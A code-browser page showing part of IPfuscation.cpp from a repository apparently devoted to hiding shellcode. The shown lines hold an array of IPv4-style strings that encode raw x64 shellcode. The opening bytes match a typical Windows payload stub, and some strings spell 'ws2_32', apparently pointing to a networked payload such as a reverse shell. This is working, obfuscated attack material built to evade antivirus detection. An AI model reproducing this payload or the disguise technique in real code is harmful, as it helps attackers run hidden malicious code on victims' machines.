MCPcopy Create free account
hub / github.com/SaadAhla/Shellcode-Hide / main

Function main

2 - Encoding/4 - IPv4 shellcode/IPfuscation/IPfuscation.cpp:10–169  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

8#endif
9
10int main() {
11
12 const char* IPv4s[] =
13 {
14 "252.72.131.228",
15 "240.232.192.0",
16 "0.0.65.81",
17 "65.80.82.81",
18 "86.72.49.210",
19 "101.72.139.82",
20 "96.72.139.82",
21 "24.72.139.82",
22 "32.72.139.114",
23 "80.72.15.183",
24 "74.74.77.49",
25 "201.72.49.192",
26 "172.60.97.124",
27 "2.44.32.65",
28 "193.201.13.65",
29 "1.193.226.237",
30 "82.65.81.72",
31 "139.82.32.139",
32 "66.60.72.1",
33 "208.139.128.136",
34 "0.0.0.72",
35 "133.192.116.103",
36 "72.1.208.80",
37 "139.72.24.68",
38 "139.64.32.73",
39 "1.208.227.86",
40 "72.255.201.65",
41 "139.52.136.72",
42 "1.214.77.49",
43 "201.72.49.192",
44 "172.65.193.201",
45 "13.65.1.193",
46 "56.224.117.241",
47 "76.3.76.36",
48 "8.69.57.209",
49 "117.216.88.68",
50 "139.64.36.73",
51 "1.208.102.65",
52 "139.12.72.68",
53 "139.64.28.73",
54 "1.208.65.139",
55 "4.136.72.1",
56 "208.65.88.65",
57 "88.94.89.90",
58 "65.88.65.89",
59 "65.90.72.131",
60 "236.32.65.82",
61 "255.224.88.65",
62 "89.90.72.139",
63 "18.233.87.255",
64 "255.255.93.73",
65 "190.119.115.50",
66 "95.51.50.0",
67 "0.65.86.73",

Callers

nothing calls this directly

Calls

no outgoing calls

Tested by

no test coverage detected